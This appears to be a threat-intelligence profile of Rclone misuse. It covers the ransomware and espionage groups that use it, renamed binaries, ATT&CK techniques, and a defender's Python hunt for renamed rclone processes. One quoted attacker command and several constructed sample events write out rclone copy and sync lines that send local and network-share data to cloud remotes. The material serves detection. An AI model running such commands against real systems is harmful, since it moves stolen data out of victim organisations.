rclone
Rclone is a legitimate open-source command-line cloud synchronization and file transfer tool that is frequently abused by threat actors for data exfiltration. Across the provided reporting, it is repeatedly described as a dominant or common exfiltration utility used to transfer stolen data from internal systems to external cloud storage services including Wasabi, MEGA, Dropbox, Google Drive, Amazon S3, OneDrive, SharePoint, and MegaSync. Threat actors often rename or disguise the binary to evade detection, with examples including crowdstrike.exe and TrendFileSecurityCheck.exe.
Observed behavior in the content includes copying data from local servers and network shares to attacker-controlled cloud buckets, using file-type exclusions or include filters to target business-relevant documents while reducing transfer size and detection risk, and leveraging OAuth-based access to Microsoft 365 services for SharePoint and OneDrive exfiltration. In one reported case, a recovered rclone configuration contained OAuth 2.0 access and refresh tokens with scopes such as Files.ReadWrite.All and Sites.Read.All. The tool was also used in conjunction with other intrusion tooling such as SystemBC, Cobalt Strike, BloodHound, Qakbot, WinRM, and commercial remote management software.
The content links Rclone use to multiple ransomware and intrusion clusters, including LockBit, BlackCat/ALPHV affiliates, Akira affiliates, Medusa/Storm-1175 activity, RansomHub, Hunters International, Medusa Group, and UNC2447, as well as Iranian state-linked MuddyWater/Seedworm operations. It is also described in espionage activity such as Operation CamelClone, where a portable Rclone v1.70.3 build was downloaded and used to upload desktop documents and Telegram Desktop session data to attacker-controlled MEGA accounts. Reported victim sectors and targets associated with incidents involving Rclone include healthcare, finance, education, professional services, transportation, defense, aerospace, government, telecommunications, non-profits, and managed environments.
High-confidence examples from the content include exfiltration of approximately 1 TB of data within 24 hours in the Capita intrusion using SystemBC and Rclone; exfiltration to Wasabi in MuddyWater/Seedworm-related reporting; use by Microsoft-observed actors following Teams/Quick Assist social engineering to move data from internal network locations to external cloud storage; use by Akira affiliates to exfiltrate data to Wasabi after renaming the binary; and use in enterprise ransomware operations where Rclone was staged on domain controllers or administrator workstations because those systems often had permissive outbound access. The content consistently characterizes Rclone as an exfiltration utility rather than a destructive payload.
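As an added defender-side example (not from this page or any of the reports it summarizes), the following Python hunt classifies process-creation events as rclone-like from the command line rather than the file name, so the renamed binaries described above (crowdstrike.exe, TrendFileSecurityCheck.exe) still surface. The sample events, paths, bucket and remote names are constructed, and the flag list is limited to documented rclone options.

```python
import ntpath
import re

# Constructed process-creation events (illustrative, not taken from the page's reports);
# the fields mimic what an EDR or Sysmon Event ID 1 record would carry.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance wasabi:[BUCKET]/srv01 --bwlimit 10M --filter-from C:\temp\filter.txt -P"},
    {"image": r"C:\Windows\Temp\crowdstrike.exe",
     "cmdline": r"crowdstrike.exe copy \\fs01\shares onedrive:backup --config C:\Windows\Temp\rc.conf --transfers 16 -q"},
    {"image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy.exe D:\Finance E:\Backup /MIR"},
    {"image": r"C:\Users\alice\Desktop\TrendFileSecurityCheck.exe",
     "cmdline": r"TrendFileSecurityCheck.exe sync C:\Users\alice\Documents mega:docs --exclude *.exe --exclude *.dll"},
]

# Rclone subcommands and flags survive a binary rename; the flag set is limited to
# options that exist in rclone's documented CLI.
SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto", "ls", "lsd", "lsf", "lsjson", "config"}
FLAGS = {"--config", "--bwlimit", "--filter-from", "--include", "--exclude", "--transfers",
         "--multi-thread-streams", "--ignore-existing", "--no-check-certificate", "-P", "--progress", "-q"}
# A remote spec looks like "name:path". Requiring a 2+ character name excludes Windows drive
# letters, and the lookahead excludes backslash paths ("D:\x") and URL schemes ("http://").
REMOTE_RE = re.compile(r"[A-Za-z0-9][\w-]+:(?!\\|//)\S*")


def analyze(event):
    """Return the rclone indicators found in one process event."""
    tokens = [t.strip('"') for t in event["cmdline"].split()]
    args = tokens[1:]  # drop argv[0], which is the (possibly renamed) image name
    found = []
    if args and args[0] in SUBCOMMANDS:
        found.append("subcommand:" + args[0])
    found += ["remote:" + t for t in args if REMOTE_RE.fullmatch(t)]
    found += ["flag:" + t for t in args if t in FLAGS]
    # Require a subcommand or remote spec plus one more indicator so that unrelated
    # tools sharing a single flag name are not flagged.
    is_rclone = any(f.startswith(("subcommand:", "remote:")) for f in found) and len(found) >= 2
    renamed = is_rclone and ntpath.basename(event["image"]).lower() != "rclone.exe"
    return {"is_rclone": is_rclone, "renamed": renamed, "indicators": found}


def hunt(events):
    """Return (image, analysis) for every event that looks like rclone, renamed or not."""
    results = [(e["image"], analyze(e)) for e in events]
    return [(image, r) for image, r in results if r["is_rclone"]]


if __name__ == "__main__":
    for image, result in hunt(SAMPLE_EVENTS):
        tag = "RENAMED " if result["renamed"] else ""
        print(f"{tag}rclone-like: {image} -> {', '.join(result['indicators'])}")
```

The `--config` and `--bwlimit` indicators correspond to the config-file upload and bandwidth throttling behaviours quoted later on this page, so they are worth weighting higher in a production rule.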
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting certain versions of Atlassian Confluence Data Center and Server. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day. | CISA, FBI, and MS-ISAC are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts.
Groups observed using it
11 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Data exfiltration via Rclone to Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
Using the ‘Rclone’ tool, the threat actor exfiltrated a high volume of data from local servers to a cloud file storage service called ‘Wasabi’.
To that aim, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration.
Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
"Additional Resources ... Rclone"; "Exfiltration Over C2 Channel (performed by SystemBC and Rclone)"
"...data exfiltration conducted through 'WinSCP' ... or a hidden or renamed version of 'Rclone.'"
...UNC2447 has been observed using the following tools: ... RCLONE ...
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
PhantomCore buys commercial software XenArmor All-In-One Password Recovery Pro and uploads the free utilities MeshAgent, RSocx, and Rclone
PhantomCore uploads MeshAgent and RSocx to directories on compromised legitimate sites and phishing sites, and uploads XenArmor All-In-One Password Recovery Pro and RClone to VPS servers
Initial Access
1 technique
Rclone... used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited.
Execution
1 technique
A predominant method observed involves the use of cURL... Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. | Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line.
Persistence
1 technique
Rclone... used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited.
Stealth
1 technique
the threat actor created a malicious file named ‘C:\Intel\svchost.exe’... attempting to mask the malware as benign activity... Additional executions of the Stowaway tunneling tool were also observed during this phase using the names ‘svchost.exe’, ‘tomcat.exe’, and ‘tomcat7.exe’.
Collection
6 techniques
Rclone was leveraged to exfiltrate data stored on a D drive on one of the compromised hosts.
T1039 Data from Network Shared Drive The BianLian gang focuses on data exfiltration, collecting data from network drives.
data transfer utilities such as Rclone were used to expand access across the enterprise environment and stage business-relevant information for transfer to external cloud storage.
PhantomCore automates collection of files and authentication data stored in local repositories and databases of infected hosts using PhantomStealer, XenArmor All-In-One Password Recovery, and Rclone
During the next three days, the threat actor attempted to exfiltrate data from several different hosts by utilizing Rclone... In some executions of the tool, the threat actor utilized a filter file to control the file types to be exfiltrated.
PhantomCore archives the authentication data and files found in local repositories and databases of infected hosts using PhantomStealer and Rclone
Command and Control
1 technique
Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line.
Exfiltration
6 techniques
Data exfiltrated via Rclone was throttled by specifying bandwidth transfer limits.
The data was exfiltrated over a 90-minute period, likely via the StealBit tool, prior to execution of the ransomware.
Once they've got access to the victim's device, they minimally escalate privileges and quickly pivot to data exfiltration without encryption, using Windows Secure Copy (WinSCP) or a hidden or renamed version of 'Rclone'.
T1537 Transfer Data to Cloud Account BianLian affiliates used Rclone to exfiltrate data to a cloud account they control to avoid typical file transfers/downloads and network-based exfiltration detection.
Post-exploitation exfiltration of data can be executed through a variety of techniques. A predominant method observed involves the use of cURL... An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited.
An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. | Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line.
Impact
1 technique
data is both exfiltrated and encrypted in place, allowing them to demand payment for unlocking and the non-release of stolen data
IOCs tracked for this family
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
51 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Command-line file synchronization and exfiltration tool used here for data theft to cloud storage.
Rclone was used to access Microsoft 365 resources via OAuth tokens and exfiltrate SharePoint and OneDrive data using API-based access.
A file-synchronization utility used by attackers to stage and exfiltrate business-relevant data from internal network locations to external cloud storage.
Rclone was used for data exfiltration in an Akira intrusion, renamed to crowdstrike.exe as a simple evasion measure.